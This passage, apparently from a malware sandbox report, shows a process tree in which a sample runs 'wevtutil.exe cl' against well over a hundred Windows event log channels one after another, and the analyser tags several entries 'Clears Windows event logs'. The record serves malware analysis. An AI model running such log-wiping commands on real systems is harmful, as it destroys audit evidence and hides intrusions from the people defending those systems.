        wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
        7⤵
        
        PID:4976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
        7⤵
        
        PID:3064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
        7⤵
        
        PID:4780
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
        7⤵
        
        PID:1004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
        7⤵
        
        PID:3248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
        7⤵
        
        PID:1320
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
        7⤵
        
        PID:284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
        7⤵
        
        PID:296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
        7⤵
        
        PID:396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
        7⤵
        
        PID:2412
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
        7⤵
        
        PID:1720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
        7⤵
        
        PID:1976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
        7⤵
        
        PID:4548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
        7⤵
        
        PID:4756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:2676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
        7⤵
        
        PID:2616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"
        7⤵
        
        PID:3732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
        7⤵
        
        PID:2920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
        7⤵
        
        PID:2260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
        7⤵
        
        PID:2536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
        7⤵
        
        PID:3992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
        7⤵
        
        PID:2040
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
        7⤵
        
        PID:2712
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
        7⤵
        
        PID:5036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
        7⤵
        
        PID:2216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
        7⤵
        
        PID:3500
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"
        7⤵
        
        PID:5004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
        7⤵
        
        PID:4132
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
        7⤵
        
        PID:1844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
        7⤵
        
        PID:4812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
        7⤵
        
        PID:4456
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
        7⤵
        
        PID:2728
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
        7⤵
        
        PID:1404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
        7⤵
        
        PID:1648
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
        7⤵
        
        PID:2000
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
        7⤵
        
        PID:4680
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
        7⤵
        
        PID:3892
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
        7⤵
        
        PID:3300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
        7⤵
        
        PID:3376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
        7⤵
        
        PID:1696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
        7⤵
        
        PID:4308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
        7⤵
        
        PID:1496
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
        7⤵
        
        PID:3176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
        7⤵
        
        PID:3748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
        7⤵
        
        PID:5020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
        7⤵
        
        PID:540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
        7⤵
        
        PID:1744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
        7⤵
        
        PID:2404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
        7⤵
        
        PID:1032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
        7⤵
        
        PID:2324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
        7⤵
        
        PID:4840
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
        7⤵
        Clears Windows event logs
        
        PID:4384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
        7⤵
        
        PID:1340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
        7⤵
        
        PID:1964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
        7⤵
        
        PID:1756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
        7⤵
        
        PID:2744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
        7⤵
        
        PID:3528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:3012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
        7⤵
        
        PID:908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
        7⤵
        
        PID:5052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
        7⤵
        
        PID:4536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
        7⤵
        
        PID:3616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
        7⤵
        
        PID:3964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
        7⤵
        
        PID:4716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
        7⤵
        
        PID:3000
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
        7⤵
        
        PID:3592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
        7⤵
        
        PID:1952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
        7⤵
        
        PID:2136
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
        7⤵
        
        PID:1564
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
        7⤵
        
        PID:2672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
        7⤵
        
        PID:3460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
        7⤵
        
        PID:1468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
        7⤵
        
        PID:1664
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
        7⤵
        
        PID:2660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
        7⤵
        
        PID:4828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
        7⤵
        
        PID:1216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
        7⤵
        
        PID:276
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
        7⤵
        
        PID:292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
        7⤵
        
        PID:3848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
        7⤵
        
        PID:2800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
        7⤵
        
        PID:4528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
        7⤵
        
        PID:4416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
        7⤵
        
        PID:4912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
        7⤵
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
        7⤵
        
        PID:3348
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
        7⤵
        
        PID:3792
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
        7⤵
        
        PID:3620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
        7⤵
        
        PID:4576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
        7⤵
        
        PID:3532
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
        7⤵
        
        PID:2308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"
        7⤵
        
        PID:3732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
        7⤵
        
        PID:3992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:2040
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:2712
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
        7⤵
        
        PID:5036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
        7⤵
        
        PID:2216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"
        7⤵
        
        PID:3500
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"
        7⤵
        
        PID:5004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
        7⤵
        
        PID:4132
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
        7⤵
        
        PID:1844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
        7⤵
        
        PID:4812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
        7⤵
        
        PID:4456
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
        7⤵
        
        PID:2728
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
        7⤵
        
        PID:1404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
        7⤵
        
        PID:4360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
        7⤵
        Clears Windows event logs
        
        PID:3368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
        7⤵
        
        PID:2688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
        7⤵
        
        PID:1648
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
        7⤵
        
        PID:3300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
        7⤵
        
        PID:3376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
        7⤵
        
        PID:1696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
        7⤵
        
        PID:4308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
        7⤵
        
        PID:1496
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
        7⤵
        
        PID:3176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
        7⤵
        
        PID:3748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
        7⤵
        
        PID:5020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
        7⤵
        
        PID:540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
        7⤵
        
        PID:1744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
        7⤵
        
        PID:2404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
        7⤵
        
        PID:1032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
        7⤵
        
        PID:2324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
        7⤵
        
        PID:420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
        7⤵
        
        PID:1092
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
        7⤵
        
        PID:4056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
        7⤵
        
        PID:4312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
        7⤵
        
        PID:1828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
        7⤵
        
        PID:3560
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
        7⤵
        
        PID:668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
        7⤵
        
        PID:2544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
        7⤵
        
        PID:4296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"
        7⤵
        
        PID:3260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"
        7⤵
        
        PID:4028
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
        7⤵
        
        PID:5012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
        7⤵
        Clears Windows event logs
        
        PID:4344
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
        7⤵
        
        PID:3396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
        7⤵
        
        PID:1364
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
        7⤵
        
        PID:3424
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
        7⤵
        
        PID:2140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
        7⤵
        
        PID:2044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
        7⤵
        
        PID:1980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
        7⤵
        
        PID:5008
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
        7⤵
        
        PID:3988
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
        7⤵
        
        PID:1548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"
        7⤵
        
        PID:5064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"
        7⤵
        
        PID:1764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"
        7⤵
        
        PID:3772
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"
        7⤵
        
        PID:5072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"
        7⤵
        
        PID:280
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
        7⤵
        
        PID:300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
        7⤵
        
        PID:988
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
        7⤵
        
        PID:312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
        7⤵
        
        PID:4468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
        7⤵
        
        PID:1748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"
        7⤵
        
        PID:3720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"
        7⤵
        
        PID:2240
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
        7⤵
        Clears Windows event logs
        
        PID:3380
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
        7⤵
        
        PID:1652
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
        7⤵
        Clears Windows event logs
        
        PID:3384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
        7⤵
        
        PID:3212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
        7⤵
        
        PID:4124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"
        7⤵
        
        PID:2852
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Help/Operational"
        7⤵
        
        PID:2468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
        7⤵
        
        PID:3440
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
        7⤵
        
        PID:4276
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
        7⤵
        
        PID:2712
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
        7⤵
        
        PID:5036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
        7⤵
        
        PID:368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
        7⤵
        
        PID:2640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"
        7⤵
        
        PID:5004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"
        7⤵
        
        PID:4132
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HttpService/Log"
        7⤵
        
        PID:1844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
        7⤵
        
        PID:4812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
        7⤵
        
        PID:4456
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
        7⤵
        
        PID:2728
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
        7⤵
        
        PID:1404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
        7⤵
        
        PID:4360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
        7⤵
        
        PID:3368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
        7⤵
        
        PID:2688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
        7⤵
        
        PID:1648
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
        7⤵
        
        PID:3300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
        7⤵
        
        PID:3376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"
        7⤵
        
        PID:1696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"
        7⤵
        
        PID:4308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"
        7⤵
        
        PID:1496
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
        7⤵
        
        PID:3176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
        7⤵
        
        PID:3748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"
        7⤵
        
        PID:5020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"
        7⤵
        
        PID:540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
        7⤵
        
        PID:1744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
        7⤵
        
        PID:2404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"
        7⤵
        
        PID:1032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"
        7⤵
        
        PID:2324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"
        7⤵
        
        PID:420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"
        7⤵
        
        PID:5112
        
        C:\Windows\system32\wevtutil.exe
        
